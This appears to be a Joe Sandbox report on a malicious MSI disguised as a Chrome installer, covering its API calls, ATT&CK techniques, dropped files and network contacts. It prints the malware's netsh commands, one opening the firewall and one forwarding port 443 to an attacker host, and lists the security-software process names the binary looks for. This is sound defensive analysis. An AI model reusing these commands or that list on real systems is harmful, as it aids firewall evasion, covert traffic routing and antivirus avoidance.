                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,5_2_6C97F1DB
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: _getptd,_LcidFromHexString,GetLocaleInfoA,_stricmp,5_2_6C97F134
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: _getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,_stricmp,GetLocaleInfoA,_stricmp,_strnicmp,_strlen,GetLocaleInfoA,_stricmp,_strlen,_stricmp,_TestDefaultLanguage,5_2_6C97F236
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: EnumSystemLocalesW,8_2_00268096
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: EnumSystemLocalesW,8_2_002680E1
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: EnumSystemLocalesW,8_2_0026817C
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: GetLocaleInfoW,8_2_0026219D
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,8_2_00268207
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: GetLocaleInfoW,8_2_0026845C
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: EnumSystemLocalesW,8_2_00261CFD
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_00268584
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,8_2_00267DF0
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: GetLocaleInfoW,8_2_0026868C
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,8_2_0026875F
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: EnumSystemLocalesW,30_2_6CDEECFD
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,30_2_6CDF68F6
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: GetLocaleInfoW,30_2_6CDF69FC
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,30_2_6CDF6ACB
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: EnumSystemLocalesW,30_2_6CDF64EF
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: EnumSystemLocalesW,30_2_6CDF6454
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: EnumSystemLocalesW,30_2_6CDF6409
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,30_2_6CDF657A
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: GetLocaleInfoW,30_2_6CDF67CD
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,30_2_6CDF6167
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: GetLocaleInfoW,30_2_6CDF6362
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: GetLocaleInfoW,30_2_6CDEF27A
                  Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_025FB63F GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,4_2_025FB63F
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_03F45D22 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,SetOaNoCache,4_2_03F45D22
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_03F36A70 wsprintfW,GetCurrentProcessId,wsprintfW,_memset,GetVersionExW,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,wsprintfW,4_2_03F36A70
                  Source: C:\Windows\System32\cscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Modifies the windows firewall
                  Source: unknownProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Safe1" dir=in action=allow program="C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
                  Uses netsh to modify the Windows network and firewall settings
                  Source: unknownProcess created: C:\Windows\System32\netsh.exe netsh interface portproxy add v4tov4 listenport=443 connectaddress=156.248.54.11.webcamcn.xyz connectport=443
                  Source: LetsPRO.exeBinary or memory string: acs.exe
                  Source: LetsPRO.exeBinary or memory string: vsserv.exe
                  Source: LetsPRO.exeBinary or memory string: kxetray.exe
                  Source: LetsPRO.exeBinary or memory string: avcenter.exe
                  Source: LetsPRO.exeBinary or memory string: KSafeTray.exe
                  Source: LetsPRO.exeBinary or memory string: cfp.exe
                  Source: LetsPRO.exeBinary or memory string: avp.exe
                  Source: LetsPRO.exe, LetsPRO.exe, 00000004.00000002.3274998990.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 00000005.00000002.2127759383.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000000D.00000002.2130925911.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000000E.00000002.2132609857.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000000F.00000002.2125913800.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 00000011.00000002.2133672402.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 00000012.00000002.2139779498.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 00000013.00000002.2139603630.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000001A.00000002.2139832943.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000001B.00000002.2139674546.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000001C.00000002.2139915999.0000000010020000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 360Safe.exe
                  Source: LetsPRO.exeBinary or memory string: rtvscan.exe
                  Source: LetsPRO.exe, LetsPRO.exe, 00000004.00000002.3274998990.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 00000005.00000002.2127759383.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000000D.00000002.2130925911.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000000E.00000002.2132609857.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000000F.00000002.2125913800.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 00000011.00000002.2133672402.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 00000012.00000002.2139779498.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 00000013.00000002.2139603630.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000001A.00000002.2139832943.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000001B.00000002.2139674546.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000001C.00000002.2139915999.0000000010020000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 360tray.exe
                  Source: LetsPRO.exeBinary or memory string: ashDisp.exe
                  Source: LetsPRO.exeBinary or memory string: TMBMSRV.exe
                  Source: LetsPRO.exe, LetsPRO.exe, 00000004.00000002.3274998990.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 00000005.00000002.2127759383.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000000D.00000002.2130925911.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000000E.00000002.2132609857.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000000F.00000002.2125913800.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 00000011.00000002.2133672402.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 00000012.00000002.2139779498.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 00000013.00000002.2139603630.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000001A.00000002.2139832943.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000001B.00000002.2139674546.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000001C.00000002.2139915999.0000000010020000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 360Tray.exe
                  Source: LetsPRO.exeBinary or memory string: avgwdsvc.exe
                  Source: LetsPRO.exeBinary or memory string: AYAgent.aye
                  Source: LetsPRO.exeBinary or memory string: QUHLPSVC.EXE
                  Source: LetsPRO.exeBinary or memory string: RavMonD.exe
                  Source: LetsPRO.exeBinary or memory string: Mcshield.exe
                  Source: LetsPRO.exeBinary or memory string: K7TSecurity.exe

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information1
                  Scripting                  		1
                  Valid Accounts                  		1
                  Windows Management Instrumentation                  		1
                  Scripting                  		1
                  Exploitation for Privilege Escalation                  		22
                  Disable or Modify Tools                  		1
                  Credential API Hooking                  		2
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomains1
                  Replication Through Removable Media                  		22
                  Native API                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Deobfuscate/Decode Files or Information                  		121
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol1
                  Screen Capture                  		22
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts13
                  Command and Scripting Interpreter                  		1
                  Valid Accounts                  		1
                  Valid Accounts                  		4
                  Obfuscated Files or Information                  		Security Account Manager11
                  Peripheral Device Discovery                  		SMB/Windows Admin Shares1
                  Credential API Hooking                  		1
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts1
                  Scheduled Task/Job                  		24
                  Windows Service                  		11
                  Access Token Manipulation                  		1
                  Software Packing                  		NTDS3
                  File and Directory Discovery                  		Distributed Component Object Model121
                  Input Capture                  		2
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud Accounts13
                  Service Execution                  		1
                  Scheduled Task/Job                  		24
                  Windows Service                  		1
                  DLL Side-Loading                  		LSA Secrets139
                  System Information Discovery                  		SSH3
                  Clipboard Data                  		Fallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts222
                  Process Injection                  		1
                  File Deletion                  		Cached Domain Credentials361
                  Security Software Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                  Scheduled Task/Job                  		232
                  Masquerading                  		DCSync151
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Valid Accounts                  		Proc Filesystem3
                  Process Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Modify Registry                  		/etc/passwd and /etc/shadow1
                  Application Window Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron151
                  Virtualization/Sandbox Evasion                  		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd11
                  Access Token Manipulation                  		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task222
                  Process Injection                  		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                  Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                  Indicator Removal                  		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1432094 Sample: sutup-Chrome.13.26.x64.msi Startdate: 26/04/2024 Architecture: WINDOWS Score: 100 79 156.248.54.11.webcamcn.xyz 2->79 91 Malicious sample detected (through community Yara rule) 2->91 93 Antivirus detection for dropped file 2->93 95 Multi AV Scanner detection for dropped file 2->95 99 12 other signatures 2->99 8 msiexec.exe 15 49 2->8         started        11 LetsPRO.exe 2->11         started        13 netsh.exe 2->13         started        16 12 other processes 2->16 signatures3 97 Performs DNS queries to domains with low reputation 79->97 process4 file5 71 C:\Windows\Installer\MSIB5FB.tmp, PE32 8->71 dropped 73 C:\Windows\Installer\MSIB59C.tmp, PE32 8->73 dropped 75 C:\Windows\Installer\MSIB54D.tmp, PE32 8->75 dropped 77 11 other malicious files 8->77 dropped 18 ChromeSetup.exe 73 8->18         started        22 LetsPRO.exe 5 6 8->22         started        25 LetsPRO.exe 8->25         started        31 15 other processes 8->31 27 LetsPRO.exe 11->27         started        107 Creates files in the system32 config directory 13->107 29 cscript.exe 16->29         started        signatures6 process7 dnsIp8 57 C:\Windows\SystemTemp\...\psuser_64.dll, PE32+ 18->57 dropped 59 C:\Windows\SystemTemp\...\psuser.dll, PE32 18->59 dropped 61 C:\Windows\SystemTemp\...\psmachine_64.dll, PE32+ 18->61 dropped 69 65 other malicious files 18->69 dropped 101 Drops executables to the windows directory (C:\Windows) and starts them 18->101 33 GoogleUpdate.exe 18->33         started        81 156.248.54.11.webcamcn.xyz 156.248.54.11, 443, 49716, 49717 Africa-on-Cloud-ASZA Seychelles 22->81 83 127.0.0.1 unknown unknown 22->83 63 C:\Users\user\99944\LetsPRO.exe, PE32 22->63 dropped 65 C:\Users\user\99944\144977.vbs, ASCII 22->65 dropped 67 C:\Users\user\99944\1, data 22->67 dropped 103 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 22->103 105 Hides threads from debuggers 22->105 37 LetsPRO.exe 25->37         started        39 conhost.exe 29->39         started        41 LetsPRO.exe 31->41         started        43 LetsPRO.exe 31->43         started        45 LetsPRO.exe 31->45         started        47 4 other processes 31->47 file9 signatures10 process11 file12 49 C:\Program Files (x86)\...behaviorgraphoogleUpdate.exe, PE32 33->49 dropped 51 C:\Program Files (x86)\...\psuser_64.dll, PE32+ 33->51 dropped 53 C:\Program Files (x86)behaviorgraphoogle\...\psuser.dll, PE32 33->53 dropped 55 65 other malicious files 33->55 dropped 85 Found evasive API chain checking for user administrative privileges 33->85 87 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 41->87 89 Hides threads from debuggers 41->89 signatures13

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  sutup-Chrome.13.26.x64.msi3%ReversingLabs
                  sutup-Chrome.13.26.x64.msi2%VirustotalBrowse

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe100%AviraHEUR/AGEN.1362051
                  C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\ChromeSetup.exe0%ReversingLabs
                  C:\Program Files (x86)\ChromeSetup.exe0%VirustotalBrowse
                  C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe0%ReversingLabs
                  C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe0%VirustotalBrowse
                  C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe0%ReversingLabs
                  C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe17%VirustotalBrowse
                  C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcp100.dll0%ReversingLabs
                  C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcp100.dll0%VirustotalBrowse
                  C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcr100.dll0%ReversingLabs
                  C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcr100.dll0%VirustotalBrowse
                  C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler.exe0%ReversingLabs
                  C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler.exe0%VirustotalBrowse
                  C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler64.exe0%ReversingLabs
                  C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler64.exe0%VirustotalBrowse
                  C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdate.exe0%ReversingLabs
                  C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdate.exe0%VirustotalBrowse
                  C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateBroker.exe0%ReversingLabs
                  C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateBroker.exe0%VirustotalBrowse
                  C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateComRegisterShell64.exe0%ReversingLabs
                  C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateComRegisterShell64.exe0%VirustotalBrowse
                  C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe0%ReversingLabs
                  C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe0%VirustotalBrowse
                  C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateOnDemand.exe0%ReversingLabs
                  C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateOnDemand.exe0%VirustotalBrowse
                  C:\Program Files (x86)\Google\Update\1.3.36.372\goopdate.dll0%ReversingLabs
                  C:\Program Files (x86)\Google\Update\1.3.36.372\goopdate.dll0%VirustotalBrowse
                  C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_am.dll0%ReversingLabs
                  C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_am.dll0%VirustotalBrowse
                  C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ar.dll0%ReversingLabs
                  C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ar.dll0%VirustotalBrowse
                  C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_bg.dll0%ReversingLabs
                  C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_bg.dll0%VirustotalBrowse
                  C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_bn.dll0%ReversingLabs
                  C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_bn.dll0%VirustotalBrowse
                  C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ca.dll0%ReversingLabs
                  C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ca.dll0%VirustotalBrowse
                  C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_cs.dll0%ReversingLabs
                  C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_cs.dll0%VirustotalBrowse

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  No Antivirus matches

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  156.248.54.11.webcamcn.xyz
                  		156.248.54.11
                  		truetrue
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://dl.google.com/update2/installers/icons/https://m.google.com/devicemanagement/data/apiLastCodGoogleUpdate.exe, 0000001E.00000002.3271726771.000000006CE05000.00000002.00000001.01000000.00000009.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104207516.00000000057C1000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://www.google.com/support/installer/?GoogleUpdate.exefalse
                        		high
                        https://m.google.com/devicemanagement/data/apiGoogleUpdate.exefalse
                          		high

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          156.248.54.11
                          		156.248.54.11.webcamcn.xyzSeychelles
                          		328608Africa-on-Cloud-ASZAtrue

                          Private

                          IP
                          127.0.0.1

                          General Information

                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1432094
                          Start date and time:2024-04-26 12:52:09 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 12m 13s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:48
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:sutup-Chrome.13.26.x64.msi
                          Detection:MAL
                          Classification:mal100.rans.troj.spyw.evad.winMSI@78/175@1/2
                          EGA Information:
                          • Successful, ratio: 55.6%
                          HCA Information:
                          • Successful, ratio: 87%
                          • Number of executed functions: 66
                          • Number of non-executed functions: 377
                          Cookbook Comments:
                          • Found application associated with file extension: .msi

                          Warnings

                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                          • Excluded IPs from analysis (whitelisted): 142.250.217.227
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, update.googleapis.com, ctldl.windowsupdate.com, hm2.webcamcn.xyz, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target LetsPRO.exe, PID 1976 because there are no executed function
                          • Execution Graph export aborted for target LetsPRO.exe, PID 5596 because there are no executed function
                          • Execution Graph export aborted for target LetsPRO.exe, PID 6640 because there are no executed function
                          • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • Not all processes where analyzed, report is missing behavior information
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • Report size getting too big, too many NtEnumerateKey calls found.
                          • Report size getting too big, too many NtOpenFile calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          12:52:57Task SchedulerRun new task: Update path: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
                          12:54:18API Interceptor71985x Sleep call for process: LetsPRO.exe modified

                          Joe Sandbox View / Context

                          IPs

                          No context

                          Domains

                          No context

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          Africa-on-Cloud-ASZAsora.x86.elfGet hashmaliciousMiraiBrowse
                          • 156.240.230.2
                          ccm9HqTuky.elfGet hashmaliciousMiraiBrowse
                          • 156.246.150.198
                          jdsfl.arm.elfGet hashmaliciousMiraiBrowse
                          • 156.228.63.11
                          SgtB2WW8ys.elfGet hashmaliciousMiraiBrowse
                          • 45.206.20.168
                          SocUwyIjOh.elfGet hashmaliciousMiraiBrowse
                          • 45.206.28.4
                          9IseFevRH6.elfGet hashmaliciousMiraiBrowse
                          • 156.240.33.243
                          SecuriteInfo.com.FileRepMalware.20155.16240.elfGet hashmaliciousGafgyt, MiraiBrowse
                          • 156.228.228.52
                          bPOGt24Mub.elfGet hashmaliciousMiraiBrowse
                          • 156.228.38.99
                          OPs5j7Yjb8.elfGet hashmaliciousGafgyt, MiraiBrowse
                          • 156.240.127.187

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcp100.dllVisualCppRedist_AIO_x86_x64.exeGet hashmaliciousUnknownBrowse
                            RDWorksV8Setup8.01.55-20210605.exeGet hashmaliciousUnknownBrowse
                              C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler.exeChrome-Setup.msiGet hashmaliciousUnknownBrowse
                                oujFMn0mdW.exeGet hashmaliciousAsyncRAT, Binder HackTool, PureLog StealerBrowse
                                  C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcr100.dllVisualCppRedist_AIO_x86_x64.exeGet hashmaliciousUnknownBrowse
                                    RDWorksV8Setup8.01.55-20210605.exeGet hashmaliciousUnknownBrowse

                                      Created / dropped Files

                                      C:\Config.Msi\5bb04c.rbs

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:data
                                      Category:modified
                                      Size (bytes):225012
                                      Entropy (8bit):6.555328951333927
                                      Encrypted:false
                                      SSDEEP:3072:7Q5Lor2Lp9Zjxt8Bd9XF6N5RTNL5tludmMiz84Fak4lNAKIpwCHLDd4CHKECNE36:7OCrUPJ84ilfnCHLDWEIMjq5vR4rnY
                                      MD5:21A609D5D5F03928641D03501F970DC2
                                      SHA1:CB33EA307E7848D5A24995748BCFAC0EDACF7D89
                                      SHA-256:2C5A3A1C83C6AD1C6B1BAE639A892A609272C28E198BC92FE37D366A67803BAB
                                      SHA-512:662E55778ABD87CBC8A0162DC3CE252058F4F1176D76053009F97E52EB676AAC5A8633F258DE6A3E5C46490E3757094BE106392B948BF92775F06D5587BED1D7
                                      Malicious:false
